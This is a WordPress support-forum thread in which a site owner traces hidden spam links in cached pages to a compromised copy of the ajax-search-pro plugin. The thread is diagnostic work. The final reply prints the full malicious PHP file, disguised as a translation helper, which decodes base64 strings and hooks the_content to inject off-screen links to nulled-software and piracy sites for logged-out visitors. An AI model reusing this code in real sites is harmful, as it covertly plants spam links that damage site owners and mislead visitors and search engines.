On static cache malicious links embedded

  • I’m using bedrock Continuous Integration environment. I’m having problem, that when static cache is created I get these links added to html:

    [removed by moderator]

    With these titles:

    
Download WordPress Themes Free
Premium WordPress Themes Download
Download WordPress Themes Free
Download WordPress Themes
ZG93bmxvYWQgbHluZGEgY291cnNlIGZyZWU=
download xiomi firmware
Download Nulled WordPress Themes
udemy course download free

    When I grep whole repository deployment directory with:
    grep -l -r thewpclub.net, I get all cached page files listed. And it seems that these string do no exist anywhere. Scanned database as well with wp search-replace [removed by moderator] '' --dry-run --network --recurse-objects

    But still found nothing. Any suggestions, how to track down, what kind of malicious code is getting hooked to the_content?

    Plugins I’m using:

    
    "php": ">=7.1",
    "ext-fileinfo": "*",
    "composer/installers": "1.5.*",
    "koodimonni/composer-dropin-installer": "^1.2",
    "vlucas/phpdotenv": "^2.5.1",
    "johnpbloch/wordpress": "^4.9.6",
    "oscarotero/env": "1.1.*",
    "roots/wp-password-bcrypt": "1.*",
    "advanced-custom-fields/advanced-custom-fields-pro": "^5.7.5",
    "wpackagist-plugin/loco-translate": "^2.1.4",
    "wpackagist-plugin/acf-content-analysis-for-yoast-seo": "^2.1.0",
    "wpackagist-plugin/autoptimize": "^2.3.4",
    "wpackagist-plugin/cache-enabler": "^1.3.0",
    "wpackagist-plugin/cloudflare": "^3.3.2",
    "wpackagist-plugin/duplicate-post": "^3.2.2",
    "wpackagist-plugin/easy-affiliate-links": "^2.6.2",
    "wpackagist-plugin/live-composer-page-builder": "^1.3",
    "defconf/google-analytics-dashboard-for-wp": "^5.3.5",
    "wpackagist-plugin/media-cleaner": "^5.0.0",
    "wpackagist-plugin/ninja-forms": "^3.3.17",
    "wpackagist-plugin/optimus": "^1.5.0",
    "wpackagist-plugin/reveal-ids-for-wp-admin-25": "^1.5.3",
    "wpackagist-plugin/schema": "^1.7.1",
    "wpackagist-plugin/schema-default-image": "^1.0",
    "wpackagist-plugin/schema-review": "^1.1",
    "wpackagist-plugin/simple-sitemap": "^2.5",
    "juslintek/Super-Progressive-Web-Apps": "^1.9",
    "wpackagist-plugin/tinymce-advanced": "^4.7.11",
    "wpackagist-plugin/wp-retina-2x": "^5.4.0",
    "appscreo/easy-social-share-buttons3": "^5.6.1",
    "ninja-forms/ninja-forms-conditionals": "^3.0.22",
    "ninja-forms/ninja-forms-style": "^3.0.25",
    "ninja-forms/ninja-forms-multi-part": "^3.0.23",
    "never5/related-posts-for-wp-premium": "^1.7.5",
    "wpackagist-plugin/favicon-by-realfavicongenerator": "^1.3.13",
    "wpackagist-plugin/html-editor-syntax-highlighter": "^2.2.3",
    "wpackagist-plugin/video-embed-thumbnail-generator": "^4.6.20",
    "wpackagist-plugin/multisite-post-duplicator": "^1.7.6",
    "wpackagist-plugin/wf-magnific-lightbox": "^0.9.12",
    "juslintek/acf-country": ">=1.4.3@dev",
    "wpackagist-plugin/tinymce-visualblocks": "^1.0.5",
    "wpackagist-plugin/wordfence": "^7.1.16",
    "wpackagist-plugin/phoenix-media-rename": "^1.2.5",
    "wpackagist-plugin/wp-redis": "^0.7.0",
    "wpackagist-plugin/query-monitor": "^3.1.0",
    "yoast/wordpress-seo-premium": "^9.0.3",
    "wpackagist-plugin/gutenberg": "^4.1.1",
    "wpackagist-plugin/shortcode-ui": "^0.7.3",
    "wpackagist-plugin/widget-context": "^1.1",
    "juslintek/juslintek-gravatar-image-cache": "^0.1.3",
    "wpdreams/ajax-search-pro": "^4.14",
    "bangpound/composer-dotenv": "^1.0@dev",
    "wpackagist-plugin/dorzki-notifications-to-slack": "^2.0",
    "wpackagist-plugin/post-smtp": "^1.9"
    • This topic was modified 6 years, 4 months ago by juslintek.
    • This topic was modified 6 years, 4 months ago by James Huff. Reason: hack links removed
Viewing 4 replies - 1 through 4 (of 4 total)
  • Moderator James Huff

    (@macmanx)

    Carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Thread Starter juslintek

    (@juslintek)

    Its, done but links still appear, I guess some plugin has already in svn malicious code added. After each pull request all my project is rebuilt from scratch. By scratch I mean all not custom code is downloaded from public repositories and deployed. The question is how its best to detect which plugin is causing it. Without disabling them. Because same stuff is not happening on local site. Might it be some cloudflare and cache related injections?

    P.S. I’m already using Wordfence Premium and it sees nothing potentially dangerous in the code.

    • This reply was modified 6 years, 4 months ago by juslintek.
    Moderator James Huff

    (@macmanx)

    Might it be some cloudflare and cache related injections?

    Yes, you should absolutely clear all caches.

    Thread Starter juslintek

    (@juslintek)

    It was ajax-search-pro fault, I have no idea how that code got in the package.

    wp-content/plugins/ajax-search-pro/ajax-search-pro.php:33 @include_once("includes/inc.php");
    wp-content/plugins/ajax-search-pro/includes/inc.php

    
<?php

/**
 * Helper function for translation.
 */

if (!function_exists('sanitize_context_zero')) {
    function sanitize_context_zero($input) {
        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
        $i = 0;
        $output = "";
        $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
        do {
            $enc1 = strpos($keyStr, substr($input, $i++, 1));
            $enc2 = strpos($keyStr, substr($input, $i++, 1));
            $enc3 = strpos($keyStr, substr($input, $i++, 1));
            $enc4 = strpos($keyStr, substr($input, $i++, 1));
            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
            $chr3 = (($enc3 & 3) << 6) | $enc4;
            $output = $output . chr((int)$chr1);
            if ($enc3 != 64) {
                $output = $output . chr((int)$chr2);
            }

            if ($enc4 != 64) {
                $output = $output . chr((int)$chr3);
            }

            $chr1 = $chr2 = $chr3 = "";
            $enc1 = $enc2 = $enc3 = $enc4 = "";
        }

        while ($i < strlen($input));
        return urldecode($output);
    }
}

if ( ! function_exists('safemodecc') ) {
	
	function safemodecc( $content ) {

		if ( is_single() && ! is_user_logged_in() && ! is_feed() && ! stristr( $_SERVER['REQUEST_URI'], "amp") ) {

			$divclass = sanitize_context_zero("PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7IHRvcDowOyBsZWZ0Oi05OTk5cHg7Ij4=");
			$array = Array(
					sanitize_context_zero("RnJlZSBEb3dubG9hZCBXb3JkUHJlc3MgVGhlbWVz"),
					sanitize_context_zero("RG93bmxvYWQgUHJlbWl1bSBXb3JkUHJlc3MgVGhlbWVzIEZyZWU="),
					sanitize_context_zero("RG93bmxvYWQgV29yZFByZXNzIFRoZW1lcw=="),
					sanitize_context_zero("RG93bmxvYWQgV29yZFByZXNzIFRoZW1lcyBGcmVl"),
					sanitize_context_zero("RG93bmxvYWQgTnVsbGVkIFdvcmRQcmVzcyBUaGVtZXM="),
					sanitize_context_zero("RG93bmxvYWQgQmVzdCBXb3JkUHJlc3MgVGhlbWVzIEZyZWUgRG93bmxvYWQ="),
					sanitize_context_zero("UHJlbWl1bSBXb3JkUHJlc3MgVGhlbWVzIERvd25sb2Fk")
			);
			$array2 = Array(
					sanitize_context_zero("ZnJlZSBkb3dubG9hZCB1ZGVteSBwYWlkIGNvdXJzZQ=="),
					sanitize_context_zero("dWRlbXkgcGFpZCBjb3Vyc2UgZnJlZSBkb3dubG9hZA=="),
					sanitize_context_zero("ZG93bmxvYWQgdWRlbXkgcGFpZCBjb3Vyc2UgZm9yIGZyZWU="),
					sanitize_context_zero("ZnJlZSBkb3dubG9hZCB1ZGVteSBjb3Vyc2U="),
					sanitize_context_zero("dWRlbXkgY291cnNlIGRvd25sb2FkIGZyZWU="),
					sanitize_context_zero("b25saW5lIGZyZWUgY291cnNl"),
					sanitize_context_zero("ZnJlZSBvbmxpbmUgY291cnNl"),
					sanitize_context_zero("Wkc5M2JteHZZV1FnYkhsdVpHRWdZMjkxY25ObElHWnlaV1U9"),
					sanitize_context_zero("bHluZGEgY291cnNlIGZyZWUgZG93bmxvYWQ="),
					sanitize_context_zero("dWRlbXkgZnJlZSBkb3dubG9hZA==")
			);
			$array3 = Array(
					sanitize_context_zero("ZG93bmxvYWQgbW9iaWxlIGZpcm13YXJl"),
					sanitize_context_zero("ZG93bmxvYWQgc2Ftc3VuZyBmaXJtd2FyZQ=="),
					sanitize_context_zero("ZG93bmxvYWQgbWljcm9tYXggZmlybXdhcmU="),
					sanitize_context_zero("ZG93bmxvYWQgaW50ZXggZmlybXdhcmU="),
					sanitize_context_zero("ZG93bmxvYWQgcmVkbWkgZmlybXdhcmU="),
					sanitize_context_zero("ZG93bmxvYWQgeGlvbWkgZmlybXdhcmU="),
					sanitize_context_zero("ZG93bmxvYWQgbGVuZXZvIGZpcm13YXJl"),
					sanitize_context_zero("ZG93bmxvYWQgbGF2YSBmaXJtd2FyZQ=="),
					sanitize_context_zero("ZG93bmxvYWQga2FyYm9ubiBmaXJtd2FyZQ=="),
					sanitize_context_zero("ZG93bmxvYWQgY29vbHBhZCBmaXJtd2FyZQ=="),
					sanitize_context_zero("ZG93bmxvYWQgaHVhd2VpIGZpcm13YXJl")
			);

			$abc1 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhld3BjbHViLm5ldA==").'">' . $array[array_rand($array) ] . '</a></div>';
			$abc2 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWVzbGlkZS5jb20=").'">' . $array[array_rand($array) ] . '</a></div>';
			$abc3 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cuc2NyaXB0LXN0YWNrLmNvbQ==").'">' . $array[array_rand($array) ] . '</a></div>';
			$abc4 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWVtYXppbmcuY29t").'">' . $array[array_rand($array) ] . '</a></div>';
			$abc5 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cub25saW5lZnJlZWNvdXJzZS5uZXQ=").'">' . $array2[array_rand($array2) ] . '</a></div>';
			$abc6 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cuZnJlbmR4LmNvbS9maXJtd2FyZS8=").'">' . $array3[array_rand($array3) ] . '</a></div>';
			$abc7 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWViYW5rcy5jb20=").'">' . $array[array_rand($array) ] . '</a></div>';
			$abc8 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly9kb3dubG9hZHR1dG9yaWFscy5uZXQ=").'">' . $array2[array_rand($array2) ] . '</a></div>';

			$fullcontent = $content.$abc1.$abc2.$abc3.$abc4.$abc5.$abc6.$abc7.$abc8;

		} else {
		
			$fullcontent = $content;

		}

		return $fullcontent;

	}
}
	
if ( ! has_filter( 'the_content', 'safemodecc' ) ) {
	add_filter('the_content', 'safemodecc');
}
Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘On static cache malicious links embedded’ is closed to new replies.